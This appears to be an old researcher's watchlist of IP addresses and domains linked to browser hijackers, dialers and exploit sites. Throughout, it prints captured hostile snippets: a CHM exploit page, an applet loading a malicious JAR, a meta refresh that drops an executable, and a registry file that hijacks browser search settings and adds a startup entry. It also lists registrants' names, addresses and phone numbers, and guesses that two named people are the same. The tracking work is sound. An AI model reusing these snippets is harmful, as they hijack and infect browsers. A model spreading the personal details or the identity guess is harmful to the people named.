81.211.105.24 searchall.info
81.211.105.24 start-page.info 
81.211.105.24 super-finder.info 
81.211.105.24 surfast.info
81.211.105.24 yobta.info (calls yopta.info)
81.211.105.24 yopta.info 
**
81.211.105.25 nkvd.us
81.211.105.37/20605/ (chm exploit trojan.byteverify/xxxtoolbar)
81.211.105.39 your-search.cc
81.211.105.45 search-biz.cc calls 69.31.86.221/img/search-biz.cc
81.211.105.47 searchcentral.cc
81.211.105.49 account suspended for tos violation
81.211.105.50 get-search.cc
81.211.105.60 best-search.cc
81.211.105.62 buysearch.cc
81.211.105.64 search-web.cc
81.211.105.66 home-search.cc
81.211.105.73 searchx.cc (searching goes to cx.linklist.cc/rjvi.php?qq=searching)
81.211.105.95 seek-all.com
now 195.190.118.132 as of 6/14/2004 see 66.55.136.82 above and 195.190.118.132 below
*************************
81.222.131.43 yoursearch247.com 
now:
ip address: 195.225.176.7 ip opens to: 195.225.176.7 drusearch.com 
host name: yoursearch247.com
alias:
ip176-7.netcathost.com
************************
81.222.131.48 lookingfor.cc (riviera.cc dns server)
81.222.131.48 riviera.cc (opens to search-twon.net and trojan alert)
81.222.131.48 search-town.net 
(scan type: realtime protection scan event: virus found!)
code in html (<applet archive="195.225.176.3/searcht/playups.jar" code="bubble.class" 
width=1 height=1></applet>)
**
manifest.mf
bubble.class
verifierbug.class
dummy.class
beyond.class
**

81.222.131.50 searchv.com
81.222.131.52 hugesearch.net
81.222.131.59 4-counter.com
81.222.131.59 icanfindit.net
81.222.131.59 gigafinder.com
81.222.131.59 dia.4-counter.com
81.222.131.59 tonser.4-counter.com
81.222.131.59 crue.global-counter.com
81.222.131.59 global-counter.com
**
82.179.166.98	heretofind.com
82.179.166.98  xxxmyporno.com
fast web solutions sro
vasiliy sedikh       
bolshvistskaya 27-81  moscow
drops exploits and a counter.exe that overwrites the notepad.exe


**
82.179.166.226  esearch.cc found in a setup.exe
esearch.cc/x/dl.php drops win32app.dll into the computer 
win32app.dll 39kb
kot sapogah
bespont 11vasuki, newmoscow 450032 russian federation
shorty.dll bho
shorty.gopher.1 = s 'gopher class'
clsid = s '{5c472352-90d0-4214-bf20-8e4a2b82f980}'
**
82.197.129.15	freeload.cc 
127.0.0.1 d8t.biz
127.0.0.1 ewizard.cc
127.0.0.1 ilxt.info (called from solongas.com/hp.htm 296f8.ilxt.info:195.225.177.22)
pan koudelka prague cz.
127.0.0.1	s1.topx.cc
127.0.0.1	topx.cc
127.0.0.1       swapx.cc
130.94.72.173	2020search.com

146.82.67.44 bossofthesauce.com
146.82.109.220 websearch.com
192.168.0.1 msie.tv
193.178.212.2  stripsaver.com
193.178.212.3  ohmygoodies.com
194.85.34.198 sex.damhost.com calls calls freephotosonly.com
194.85.34.200 damhost.com
194.85.34.200 free.milfondick.com
195.190.118.131 searchx.cc
195.190.118.131 searchx.cc
195.190.118.132 4e064.ilxt.info  (calls 4e064.ilxt.info/jnoo.php uses support20600 @ sesupport.com for email)
195.190.118.132 count.cc - address in many dll hijacking files.  
8/27/4 calling 88510.ilxt.info/yhhf.php
(search results point to s12ds2.d8t.biz/dtcq.php 195.190.118.132 )
195.190.118.132 oz.msie.tv (uses search enterface like searchx.cc)
calls 4bf65.ilxt.info
also calls:  38115.ilxt.info/search.php?index_id=307&ww=spyware


195.190.118.132 searchx.cc (search results s12ds2.ewizard.cc/wzsv.php?qq=my+search)
195.190.118.132 s12ds2.ewizard.cc 
195.190.118.132 s12ds2.d8t.biz
127.0.0.1 d8t.biz (pan koudelka prague cz)
ping for a whois ip:this brings back the loopback ip and is also what is used in host 
files to keep from going to a site.

**************************************************
domains with whois for ip's showing loopback address
**************************************************
ewizard.cc results: 127.0.0.1
d8t.biz results 127.0.0.1

************


host name: realsearch.ws (81.211.105.22 ns1.realsearch.ws)
answer records 
realsearch.ws 1 ns ns2.realsearch.ws 21536s 
realsearch.ws 1 ns ns1.realsearch.ws 21536s 

additional records 
ns2.realsearch.ws 1 a 81.211.105.23 21536s 
ns1.realsearch.ws 1 a 81.211.105.22 21536s 


**

195.190.118.155 generic search engine
195.190.118.157 searchmeup.cc 
searchmeup.cc/seba/install.htm contains javascript" src="code.php"
searchmeup.cc/seba/code.php is the wmp exploit code encrypted:
this calls searchmeup.cc/seba/md.htm which closes a small second browser window.
it then calls searchmeup.cc/seba/redir.php which runs the chm exploit

195.190.118.158 coolwebsearch.cc
195.190.118.162  heretofind.com  (vasiliy sedikh  fast web solutions sro ru)
195.190.118.253 js.searchx.cc
195.225.176.3 (belongs to lookfor.cc in contact link)
195.225.176.3 riviera.cc
195.225.176.5 (listed as easy web search)
195.225.176.6 allneedsearch.com (dns server find-itnow.com 38.117.144.50)
195.225.176.6 bestpornnews.com
195.225.176.6 search-all.net calls coolwebsearch.com
195.225.176.6 all-find.net (straub, donald) calls find-itnow.com
195.225.176.7	daily-search.com
195.225.176.7	dirty-old-woman.com
195.225.176.7   drusearch.com (part of the netcathost.com russian hosting server) 
(has 66.230.164.180/jsclick.php in page pornxxxsearch.com in code)
195.225.176.7	oldsuki.com
195.225.176.7   pornxxxsearch.com
195.225.176.7	search-instructor.com  viktor viktorovich        
195.225.176.7	viewpornkey.com
195.225.176.7	yoursearch247.com

195.225.176.8 snm search
195.225.176.9 searchhh.com
195.225.176.12  rf104.com cws calls rf104.com/z/img1.gif - this is really a dll or exe file.  pavel petroff (name @ yellow500.com)created in upx2 
195.225.177.13 195.225.177.13/20609/whocares.jpg
195.225.177.18	ruworld.com found in system.exe from a cws hijacking.

195.225.177.20	search-and-more.com
195.225.177.20  search-control.com drops a trojan : trogan "c:\m.exe
evgeni braun
425 east 61st st. 5th floor
new york, new york 10021


195.225.177.21	2awn.com  icq 44481491 runs the doctoxsp chm - on-line.exe exploit

195.225.177.22 296f8.ilxt.info (called from solongas.com/hp.htm 69.31.80.128)
calls c0bb8.ilxt.info/csas.php 195.225.177.22

195.225.177.22 c0bb8.ilxt.info (uses support20600@sesupport.com)
195.225.177.22 freepage.ws
195.225.177.22 your-startpage.com
195.225.177.26  008k.com was  209.66.114.129 (yohansen, olaf support@searchv.com 81.222.131.50)
code: runsearch.com/find.php and 05p.com/pop.html

195.225.177.26	010402.com
195.225.177.26	171203.com
195.225.177.26	20x2p.com
195.225.177.26	212-229-05.com
195.225.177.26	284b.com
195.225.177.26	39-93.com
195.225.177.26	61-31.com
195.225.177.26	664p.com
195.225.177.26	a-137.com
195.225.177.26	n-udd.com
195.225.177.26	p-uud.com
195.225.177.26	t058.com
195.225.177.26	u-239.com
195.225.177.26	v-224.com
195.225.177.28	t.swapx.cc
195.227.130.71 schutz.de
195.227.130.76 axa.de
195.242.9.13 homepage.ru (coolwebsearch.com affiliate)
198.65.114.250 pop.popuptoast.com
198.104.159.153 search.2020search.com198.65.114.250
199.227.31.199  199.227.31.199/ssredir/gb.html  dialer
(code calls 204.177.92.68/infoservices/dpath/dlnsuk.jhtml?dialer
which loads: 204.177.92.193/party/int/index04.jhtml?pin=800053 which is clsid:da9a0b1e-9b7b-11d3-b8a4-00c04f79641c nsupd9x.cab#version=1,0,0,6)

204.177.92.193 installs nsupdate.dll (proclaim telcom dialer)
204.177.92.198 lexitrans 4550 w. 109th st. overland park ks us
(loads porn dialer 204.177.92.201 /ec/ affpp/ id500007/ dialer_activex.cab
code in the dialer_activex.cab which is really a page that drops the dialer automatically into the system32 folder and immediatly accessess the internet.
meta http-equiv="refresh" content="0;url=hxxp://204.177.92.198/desire.exe?pin=500007")

204.181.57.152 findwhat.com 
205.134.179.221 qmov.com
205.177.124.86 search-center.com
205.205.36.77  goldenpalace.com bundled with public.windupdates.com 
205.236.189.50 smartbotpro.net
205.236.189.57 default-homepage-network.com (seismic entertainment productions )
205.246.203.30 ifriends.net 
205.246.203.35 apps7a.ifriends.net (affiliated with greg-search.com exploits)
apps7a.ifriends.net/~wsapi/aexplorer.dll is a coded page that loads in the browser
205.246.203.35 archiveview.ifriends.net
205.246.203.39 access2.ifriends.net (calls access2.ifriends.net/cgis/favlist.exe which 
opens a logon password box)
205.252.49.154  directorydrugs.com (uses searchmeup.com, mihail pavlovich ru)
205.252.49.154  spyware-removal.name (uses spywareinfo in its page) 

206.161.125.149	installs winxpsys.dll {0e1230f8-ea50-42a9-983c-d22abc2eed3b}
206.161.127.66 ie-search.com 
(ie-search.com/find.html (umaxsearch.com in code) calls search-ing.com
  
206.161.124.66 world-search.biz
206.161.127.66 ie-search.com
206.161.127.66 100mature.net
206.161.127.66 100pantyhose.com
206.161.127.66 123zae.biz
206.161.127.66 18age-domination.com
206.161.127.66 2000guys.com
206.161.127.66 achaeans.com
206.161.127.66 achileos.com
206.161.127.66 ad-ua.com
206.161.127.66 addictivetoporn.com
206.161.127.66 adult-xxx-tgp.com
206.161.127.66 adultchat-rooms.biz
206.161.127.66 aktobut.com
206.161.127.66 allnakedboys.org.
206.161.127.66 americanboy.net
206.161.127.66 anime-babes.info.
206.161.127.66 art-various.com
206.161.127.66 babesxxx.net
206.161.127.66 beast4me.com
206.161.127.66 bonne-pute.com
206.161.127.66 bradleyhits.biz
206.161.127.66 bruteens.com
206.161.127.66 bustymommy.com
206.161.127.66 cashinfo.biz
206.161.127.66 charming-teens.com
206.161.127.66 coolteenporno.com
206.161.127.66 dailyteenspic.com
206.161.127.66 darkrapesex.com
206.161.127.66 dog-cum.com
206.161.127.66 dreamxsex.com
206.161.127.66 dreamxsite.com
206.161.127.66 ebookcreatorpro.biz
206.161.127.66 fetishcrime.biz
206.161.127.66 fille-africaine.com
206.161.127.66 finenylon.com
206.161.127.66 freeadult-webcams.biz
206.161.127.66 freeteen-sluts.com
206.161.127.66 fuckedboys.net
206.161.127.66 gay-desire.com
206.161.127.66 gaysincest.com
206.161.127.66 get-bondage-bdsm.com
206.161.127.66 go4sexxx.com
206.161.127.66 goodxxx.net
206.161.127.66 hidden-files.com
206.161.127.66 hotbigtit.com
206.161.127.66 hotnetteens.com
206.161.127.66 hotsexxgirl.com
206.161.127.66 hungrypussi.com
206.161.127.66 image-chaude.com
206.161.127.66 inferns-soft.com
206.161.127.66 ircforever.net
206.161.127.66 karpina.com
206.161.127.66 land-xxx.com
206.161.127.66 leonixxx.com
206.161.127.66 lesbo-desire.com
206.161.127.66 lolmature.com
206.161.127.66 marablic.com
206.161.127.66 mature-tech.com
206.161.127.66 maturejournal.com
206.161.127.66 methodsilva.com
206.161.127.66 mikrovin.com
206.161.127.66 monster-rape.com
206.161.127.66 nextcunt.com
206.161.127.66 nikusha.biz
206.161.127.66 nude-livegirls.biz
206.161.127.66 nude-videochat.biz
206.161.127.66 nylonerotica.net
206.161.127.66 pl-club.com
206.161.127.66 pornogalaxy.biz
206.161.127.66 pornrest.com
206.161.127.66 postforwarding.biz
206.161.127.66 prohor.com
206.161.127.66 project-21.info.
206.161.127.66 project-twenty-one.info.
206.161.127.66 proupver.com
206.161.127.66 rapechaos.com
206.161.127.66 rapeflare.com
206.161.127.66 s4teens.com
206.161.127.66 sex3dom.com
206.161.127.66 sexdeluxe.net
206.161.127.66 sexinwar.net
206.161.127.66 sexxela.com
206.161.127.66 sexxx-4you.com
206.161.127.66 sexxxgate.com
206.161.127.66 smutbitches.com
206.161.127.66 teens-adult.com
206.161.127.66 teens-hc.com
206.161.127.66 teensdom.com
206.161.127.66 teensunion.net
206.161.127.66 the-forex.com
206.161.127.66 thebestgallery.net
206.161.127.66 thebestmatures.com
206.161.127.66 top-searchs.com
206.161.127.66 topfreeteens.com
206.161.127.66 trahvideo.com
206.161.127.66 ukr-girls.com
206.161.127.66 unique-porn.com
206.161.127.66 webcam-girlsnude.biz
206.161.127.66 webnymphets.com
206.161.127.66 wminvest.biz
206.161.127.66 world-hyp.biz
206.161.127.66 world-search.biz
206.161.127.66 x-eroticbabe.com
206.161.127.66 xmatureporn.com
206.161.127.66 xsby.org.
206.161.127.66 xxx-revolution.com
206.161.127.66 xxxenjoy.net
206.161.127.66 zetta-search.com
206.161.127.66 ztomb.com
206.161.127.74 error.99fh.com cws search site using searchmeup.com for results
206.161.200.110 99fh.com
206.161.200.110 0cj.net  cws search site uses sesupport email.
206.253.214.102 bestsekch.cc
206.253.214.102	ehtp.cc
206.161.202.130 search-ing.com
206.161.205.30	richfind.com   (ben macdui, s.l palma de mallorca es)
207.44.156.26/~admin3/ron/ron.php
207.44.156.26/~admin3/ron/adsredir.php
207.44.204.97 freephotosonly.com - calls 64.246.18.41 little-lady.net(coolwebsearch.com)
207.44.206.115 startium.com
207.127.102.230 searchcactus.com

207.246.158.17 nudityforfree.com (called in hardcoreover.com)
207.246.158.17 amandabbw.com
207.246.158.17 amateurxposed.com
207.246.158.17 awesometeenmovies.com
207.246.158.17 dirtysouthhohouse.com
207.246.158.17 gayboynetwork.com
207.246.158.17 gaycampus.net
207.246.158.17 gaymalepornpics.com
207.246.158.17 girlsland.biz
207.246.158.17 lesbee.com
207.246.158.17 mad4porn.com
207.246.158.17 mokar.com
207.246.158.17 nudityforfree.com
207.246.158.17 pantycandy.net
207.246.158.17 sexscn.com
207.246.158.17 sextoywonderland.com
207.246.158.17 tastycams.com
207.246.158.17 thadsadultsuperstore.com
207.246.158.17 thadsamateurs.com
207.246.158.17 thadsasians.com
207.246.158.17 thadsboys.com
207.246.158.17 thadscandidcamera.com
207.246.158.17 thadscollegegirls.com
207.246.158.17 thadsfriends.com
207.246.158.17 thadshometowngirls.com
207.246.158.17 thadslatins.com
207.246.158.17 thadsprivatevideos.com
207.246.158.17 thadsxratedswingers.com
207.246.158.17 theplayfulwife.com
207.246.158.17 wandererx.com
208.48.15.11 popupguard.com
208.48.15.11 ads.softwareoutfit.com
208.48.15.11 kpremium.com
208.48.15.11 internetantispy.com
internetantispy.com/pop.htm (contains unicode of smartbot.net from trixscripts.com 
209.249.147.131 that belongs to asher nahmias)
part of it: <style>\u000d\u000a@media all {\u000d\u000a 
\u0049e\u005c\u003a\u0048\u004f\u004de\u0050\u0041\u0047e 

when decoded it is as follows:
@media all {
ie\:homepage {behavior:url(#default#homepage)}
}
</style>
<ie:homepage id="homepage" />
<!--top secret link generator page copyright 2003 smartbot.net, inc. all rights reserved 
- copyright 1999-2003 trixscripts.com e-mail:webmaster @ trixscripts.com
1- you may not remove this copyright notice.
2- you are not allowed to decompile this code and place it on your pages.
3- copy this page content as is to any of your pages/websites
--> 
<applet code="enter" mayscript width=0 height=0></applet>')</script><script 
language="javascript">
**
208.48.15.31 billingnow.com (billing service that works with internetantispy.com and 
other hijackers)

208.185.230.221 karasxxx.com

208.237.254.40 7search.com
209.8.161.51 aifind.com (huy v sapogah ru)
209.8.161.51 aifind.biz (huy v sapogah ru)
209.8.161.51 aifind.info
209.25.147.9 swift-look.com (called in fast-look.com)
******passthison exploits***************
209.25.152.19 fuckingfree.net
209.50.251.151/console/media.html
209.50.251.151 banner-server-usa-english.com (sandford wallace)

default-homepage-network.com/start.cgi?hkcu
209.50.251.164 server224.smartbotpro.net
209.50.251.164/7search
209.50.251.175 searchtraffic.com (standardinternet.com)
209.50.251.182/e1/pre-e1.cgi 
209.50.251.182/e1/preexploit.htm 
209.50.251.182/new-exploit5/exploit.htm
<textarea id="code" style="display:none;"> <object 
data="&#109;s-its:mhtml:file://c:\foo.mht!${path}/exploit.chm::/exploit.htm" 
type="text/x-scriptlet"></object></textarea><script language="javascript"> 
document.write(code.value.replace(/\${path}/g,location.href.substring(0,location.href.ind
exof('exploit.htm'))));</script>
209.50.251.182/new-exploit5//exploit.chm
209.50.251.182/newspynotice.html 
209.50.251.182 cpm-04.com (seismic entertainment productions)
209.50.251.182/adc/adc-z.html
209.50.251.182/adc/ ad server that also has the adware installs 

*******

seismic entertainment productions, inc.
209.50.251.194 lovemynet.com

209.50.251.195 passthison.com
"due to new laws being enacted and controversy surrounding our business model, we have 
voluntarily decided to implement the cease of all 
current business practices by the end of june 2004."

209.50.251.209 clickheretofind.com (standardinternet.com)
209.50.252.113 object.passthison.com
209.50.253.170 21century-mp3.nu (hugo milinhos/lop.com - spawnet.com dns)

209.66.114.129	full-search.net (pavel petroff ru)
209.66.114.129 search-1.net
209.66.114.129 search-company.com
209.66.114.129 search-and-find.net calls searchv.com
calls: search-1.net/cgi/search.php
search-1.netcalls:81.222.131.50 lookfor.cc which shares ip with searchv.com
lookfor.cc links with 209.66.114.129 search-direct.net
209.66.114.129 search-about.net 

209.66.114.129 00hq.com
209.66.114.129 go2-search.com ( pavel petroff )
ip address: 209.66.114.129
host name: go2-search.com
code in file: clsid:b45ff030-4447-11d2-85de-00c04fa35c89
alias:
advanced-dns1.com
209.66.114.129 hotbookmark.com 
209.66.114.129 search-to-find.com
209.66.114.129 hotbookmark.com
209.66.114.129 onemoresearch.net
209.66.114.129 opsex.com
209.66.114.129 search-1.net
209.66.114.129 search-777.com
209.66.114.129 search-about.net
209.66.114.129 search-aid.com
209.66.114.129 search-all-fast.com
209.66.114.129 search-and-find.net
209.66.114.129 search-click.com
209.66.114.129 search-company.com
209.66.114.129 search-direct.net
209.66.114.129 search-motor.com
209.66.114.129 search-to-find.com
209.66.114.129 search-what.net
209.66.114.129 searchxp.com
209.66.114.129 t73.com
209.66.114.129 umaxpartner.com
209.66.114.130 runsearch.com 
209.66.115.82 zesearch.com
209.66.115.157 thematurehardcore.com (part of the pansion.cz chm exploit)
209.66.122.49 v61.com (code in search-about.net/ support support@ssl4all.com) also calls 008k.com 
209.66.122.164 in.webcounter.cc
209.66.123.187 x.full-tgp.net
209.66.124.216 hotsex.fuckingfree.net
209.120.239.240 wickedgooddeals.com
209.185.12.42 adultfriendfinder.com (called from 69.31.86.240)
209.217.54.210 mcpromotions.com

209.249.147.70 zeropopup.com (asher nahmias group)
209.249.147.131 trixscripts.com (asher nahmias group)
210.52.214.204	allyes.com
210.219.250.168	theparadise.x-y.net (korean cws hijacker
211.100.17.98	ufo365.com
211.224.129.86	b00gle.com
211.224.129.86 trytoimprovesecurity.com
211.224.129.86 b00gle.com
212.40.165.87 lefun.de (called from 64.237.47.210 xxx-goto.net)
212.72.51.77  search.findwhatevernow.com called from findwhatevernow.com:64.157.143.86

212.80.76.3 seznam.cz
212.80.76.18 seznam.cz
213.4.130.210 terra.es
213.159.98.138 linkey.ru
213.159.98.203 windows media player exploit
213.159.117.52  smart-security.info aleksandr romantsev russina federation
213.159.117.52  security-web.biz
213.159.117.52  security-web.info
213.159.117.52  smartsecure.info 
213.159.117.130 calls: (213.159.117.52  smart-security.info aleksandr romantsev)
213.159.117.133 hijacker, wmplayer and telnet hijacker
213.159.117.146  petite-virgins.biz ( nick fedorov russian federation)this calls code that loads 213.159.117.133 and overwrites telnet.exe with loadadv65.exe that is installed.
213.159.117.147	zy web search: exploiter (installs the gdnus333.exe) search results are linked to searchmeup.com  uses the 213.159.117.133 hijacking.
mhtmlredir.exploit: microsoft has released patch ms04-013 to address this issue.
microsoft.com/technet/security/bulletin/ms04-013.mspx

(petite-virgins.biz/dl/adv74/x calls 213.159.117.133/legal/x.chm)
213.159.117.148 cashsearch.biz 
213.159.117.149 security-web.info scare ad
213.159.117.150/connect.cgi?id=333
(nick fedorov/(search calls 38.113.198.235 searchmeup.com umaxsearch ltd )
porn dialer popup: 213.159.117.150/1/deagb13.exe
clsid:11111111-1111-1111-1111-111111111237" codebase="1/deagb13.exe
213.159.117.133/dl/adv65.php (runs a chm exploit)
213.159.117.133/dl/loader_adv65.js calls: 213.159.117.133/dl/shellscript_adv65.js
213.159.117.133/dl/shellscript_adv65.js
213.159.117.133/dl/loadadv65.exe";(if(navigator.appversion.indexof("windows nt 5.1")!=-1) 
savetopath="c:\\windows\\system32\\telnet.exe)

213.159.117.133/dl/system.exe goes to 213.159.117.133
213.159.117.150/connect.cgi?id=333
213.159.117.133/dl/redir.php
213.159.117.133/dl/adv65.php this loads the loader_adv65.js that calls the 
shellscript_adv65.j where it tries to download the loadadv65.exe overwrites telnet.exe 
and then deagb333.exe runs the shell command password and login to a telnet session.
213.159.117.150/1/deagb333.exe is a porn dialer
and norton would give alert:bloodhound.exploit.10 and the browser address would then 
show:


213.159.117.133/dl/redir.php
(ms-its:c:\ windows \help \ iexplore.chm : : / iegetsrt.htm)

213.159.117.133/dl/adv65/x.chm::/x.htm
by clicking the'yes'box you will beconnected to a pay-per-call service 
featuring adult content where
you will be charged 1.50 gbp per minute. called number:09099672806
213.159.117.134	213.159.117.134/index.php
213.159.117.134	213.159.117.134
213.159.117.146	petite-virgins.biz
213.159.117.148	cashsearch.biz
213.159.117.150	213.159.117.150/deagb333.exe
213.159.117.194  outhost.info  
idoo menson ny ny (ip is russian federation)
213.159.117.194  freednshost.info (ip is russian federation)
peter nova free dns hosting
cuba

213.159.117.194  llfgjc.outhost.info
213.159.117.194  aoufju.outhost.info
213.204.150.18   haldex.com
213.222.11.6     searchbar.findthewebsiteyouneed.com
213.239.132.37  thunderdome.com 
213.239.132.37  id-t.com 213.239.132.37
213.239.132.37  thunderdome.id-t.com
216.12.144.21   searchfeed.com
216.12.200.32   line-plus.com
216.17.108.202  coolloud.org
216.35.187.246	instalg.ws (found in code of xxxtoolbar.com file bhui.exe)
216.40.33.117 wazzupnet.com
216.55.137.54 freepornbest.com
216.55.168.3 crossdots.com
216.55.176.22 darkest.com
216.65.38.226	installs download_plugin.exe a download trojan

216.115.95.98	runs 38ble.chm exploit wincfgrid.exe
******************************************
integrated search technologies, xxxtoolbar.com
****************************************** 

216.127.33.25 cgi.gammae.com 
216.127.33.68 tracking.gammae.com 
216.127.33.92 isearchtech.com (integrated search technologies, xxxtoolbar.com) 
(advertisers site)
216.127.33.92 power-cleaner.com (integrated search technologies, xxxtoolbar.com)
216.127.33.92 toolbarcash.com (webmaster tools)
claims to sell powerscan to clean porn..
216.127.33.92 gammae.com
216.127.33.92 gammacash.com .
216.127.33.119 couldnotfind.com
216.127.33.119 install.xxxtoolbar.com (adult toolbar)
216.127.33.119 slotch.com 
216.127.33.119 slotchbar.com (non adult toolbar)
216.130.185.143  begin2search.com aztec marketing installs winb2s32.cab
216.131.78.241	teocash.com
216.131.86.213	absolutelyfreemovies.com
216.133.246.137	adtraffic.net 
adtraffic.com 269 s south beverly dr
suite 1200 beverly hills, california 90212 us
installs icmedia404.cab eestartup.exe
clsid={e4463a35-7e7a-4621-8248-91307afa8ead}

*****************
cyber heat: sells bps clones
216.158.129.77	cyberheatinc.com 
216.158.129.77	iblockpopups.com
216.158.129.77	internetquicksearch.com 
216.158.129.77	internetquicksearch.net
216.158.129.77	iquicksearch.com 
216.158.129.77	iquicksearch.net 
216.158.129.77	mysearchhome.com 
216.158.129.77	searchbuckz.com
216.158.129.77	seekio.com
216.158.129.77	sureseeker.com


216.194.70.7  vbs.searchcom
216.195.35.34	v73.us
**
216.195.34.102 uralcash.com called from pansion.cz

**************************************
asher nahmias group 

**************************************
216.240.137.40 amigeek.com (asher nahmias group)
216.240.137.41 gocybersearch.com (asher nahmias group)
uses the *.reg files for hijacking
"sp"="regedit -s c:\\sp.reg"
[hkey_current_user\software\microsoft\internet explorer]
"searchurl"="gocybersearch.com/ie/"

[hkey_current_user\software\microsoft\internet explorer\main]'
"default_search_url"="gocybersearch.com/ie/"
"search page"="gocybersearch.com/ie/"
"search bar"="gocybersearch.com/ie/"
"searchurl"="gocybersearch.com/ie/"

[hkey_current_user\software\microsoft\internet explorer\search]
"searchassistant"="gocybersearch.com/ie/"

[hkey_local_machine\software\microsoft\internet explorer\search]
"searchassistant"="gocybersearch.com/ie/"

[hkey_local_machine\software\microsoft\windows\currentversion\run]
"sp"="regedit -s c:\\sp.reg"

******************
216.251.43.11 messagebroadcaster.net
217.11.48.101 fanatik.net
217.73.65.232 easyconnecting.com (calls pluginaccess.com)
217.73.65.232 pluginaccess.com (brings up and install:217.73.66.1/del/browser_plugin.exe)
217.73.65.232 dialeraccess.com (nl)
217.73.66.1 217.73.66.1/del/browser_plugin.exe (downloader trojan)
217.73.66.1/del/d_a_loader.cab clsid:ad7fafb0-16d6-40c3-af27-585d6e6453fd
217.73.66.1/del/d_a_loader.exe
217.73.66.1	217.73.66.1 /del/.dia.exe.cmb.dll dialer

217.115.197.134 parcproductions.com 
parc productions waalsteeg 4-6
amsterdam, nh 1011 er nl

219.129.216.39 555y.com
219.129.216.39 y3y.net

***********************************
watcherlist
***********************************
transponder sites and ip addresses
   
63.99.209.59	ipinsight.com
63.99.213.15	callinghome.biz
63.99.213.17	mail.callinghome.biz
63.99.213.17	mail.localnrd.com
63.99.213.17	mail.multimpp.com
63.99.213.23	localnrd.com
63.99.213.23	multimpp.com
63.99.224.18	mail.thinkingmedia.net
63.99.224.19	amazingmerchants.com
63.99.224.20	thinkingmedia.net
63.99.224.21	direct-revenue.com
63.99.224.34	mail.clickalchemy.com
63.99.224.37	clickalchemy.com
63.99.224.37	stop-popup-ads-now.com
63.99.224.44	mail.cleangetaway.biz
63.99.224.44	mail.mypanicbutton.com
63.99.224.47	cleangetaway.biz
63.99.224.47	mypanicbutton.com
63.99.224.55	mail.grandstreetinteractive.com
63.99.224.55	mail.mx-targeting.com
63.99.224.55	mail.twain-tech.com
63.99.224.57	mail.ipinsight.com
63.99.224.57	mx-targeting.com
63.99.224.57	twain-tech.com
63.99.224.59	grandstreetinteractive.com
63.99.224.62	mail.freephone.cc
63.99.224.62	mail.msview.cc
63.99.224.65	msview.cc
63.99.224.65	freephone.cc
63.240.11.36    ns3.disk11.com
63.240.11.37    ns4.disk11.com
63.240.11.38	mail.disk11.com
63.240.11.56	disk11.com

64.191.159.120	xads.offeroptimizer.com
64.191.159.120	xadsq.offeroptimizer.com
64.191.159.120	xadx.offeroptimizer.com
64.191.159.123	ximages.offeroptimizer.com
64.191.159.125	reports.offeroptimizer.com
64.191.159.132	c.abetterinternet.com
64.191.159.133	drk.localnrd.com
64.191.159.133	s.abetterinternet.com
64.191.159.133	s.freephone.cc
64.191.159.133	update.stop-popup-ads-now.com
64.191.159.4	mail.hostpool.net
64.191.159.9	mail.direct-revenue.com
64.191.159.9	mail.hostpool.net
64.202.165.92	mail.mypctuneup.com
64.41.111.75	truedata.org
64.41.114.15	tps108.org
64.66.168.38	ec16.com
64.66.168.38	mail.ec16.com
65.255.32.5	letssearch.com
65.255.32.5	skinhead.com
65.255.32.5	top10sites.com
65.255.32.5	offeroptimizer.biz
65.255.32.70	mail.offeroptimizer.biz
65.255.32.70	mail.offeroptimizer.biz
65.255.32.70	offeroptimizer.biz
65.255.32.8	quicklaunch.com
65.61.130.193	server.ipinsight.net
66.113.131.20	abetterinternet.com
66.113.176.180	bestoffers.bz
66.113.176.180	mail.bestoffers.bz
66.199.187.168	munky.com
66.199.187.168	nameadministration.com
66.199.187.168	pantyland.com
66.199.187.168	steelwool.com
66.199.187.175	adblock.com
66.199.187.175	adblock.linkz.com
66.199.187.175	hostpool.com
66.199.187.175	linkz.com
66.199.187.175	nameadmininc.com
66.199.187.175	smartcasual.com
66.199.187.177	hostpool.com
66.216.73.160	belt.abetterinternet.com/bi/servlet/belt?stubname=belt
66.216.73.160	corr.conscorr.com
66.216.73.160	stubmon.ipinsight.net
66.216.73.161	sentrymon.ipinsight.net
66.216.86.121	download.ipinsight.net
66.28.193.28	wasteland.com
66.28.193.30	sssh.com
66.28.193.40	magicalneeds.com
66.28.193.40	magickalneeds.com
66.28.193.41	phoenixgrp.com
66.28.193.42	rowntree.net
66.28.193.52	rowntreephotography.com
66.28.193.53	cosmicvillage.com
66.28.193.55	idivination.com
66.28.193.55	spankingepics.com
66.28.193.55	spanking-epics.com
67.18.108.146	404.grandstreetinteractive.com
69.20.11.234	config.grandstreetinteractive.com
69.20.5.14	cr.stop-popup-ads-now.com
69.20.5.14	mail.stop-popup-ads-now.com
69.20.5.39	69.20.5.39/download/cabs/bi5101/
69.20.5.39	69.20.5.39/download/cabs/bilatest/
69.28.146.21	xlime.offeroptimizer.com
69.28.159.9	static.abetterinternet.com
69.28.159.9	static.callinghome.biz
69.28.159.9	sysupdate.grandstreetinteractive.com
69.90.32.140	download2.abetterinternet.com
69.90.32.70	get.freephone.cc
199.107.188.143	thinstall.abetterinternet.com
199.107.188.150	download.abetterinternet.com
206.27.12.157	insightpartners.com
207.217.96.41	sohodigital.net
207.217.96.43	sohodigital.net
*************************************
207.246.105.6   ns1.disk11.com
207.246.105.39	test.disk11.com
207.246.105.49	celticfestival.org
207.246.105.49	arricraft.com
207.246.105.49	dev11.com
207.246.105.49	dev11.net
207.246.105.49	develan.com
207.246.105.49	develan.net
207.246.105.49	freeproductions.com

domain name:         freeproductions.com
registered owner:    freeproductions
jerry  clotfelter
4809 mandarin pl
lexington  ky  40514 us
phone: 859-223-5380
hostmaster@celticfestival.org
created on:      mon sep 25 00:08:11 2000
expires after:   mon sep 25 23:59:59 2006
ns1.disk11.com
ns2.disk11.com
*************************************************
question: is jerry williams the same jerry clotfelter
since the new email is hostpool.net belonging to the transponder gang, then i can only assume that the two jerry's are one in the same.

pipe9.com - no ip:
search.pipe9.com 
11/14/2004 whois:

registrant:
pipe9 corporation
459 columbus ave #264
new york, ny 10024 us
domain name: pipe9.com

administrative contact, technical contact:
williams, jerry  jerry@hostpool.net
459 columbus ave #264
new york, ny 10024 us

888-813-1230 fax: 209.671.9818

record expires on 24-feb-2005.
record created on 24-feb-2000.
database last updated on 14-nov-2004 11:26:25 est.
domain servers in listed order:
ns1.disk11.com  207.246.105.6
ns2.disk11.com  207.246.105.7

4/04/2004 whois:
part of commerceinc.com
pipe9 corporation (pipe26-dom)
4809 mandarin pl
lexington, ky 40514 us
domain name: pipe9.com

administrative contact, technical contact:
clotfelter, jerry  jerry@celticfestival.org
celtic festivals
4809 mandarin lexington, ky 40514  us
(606) 223-5380 fax: 209.671.9818
record expires on 24-feb-2004.
record created on 10-may-2002.
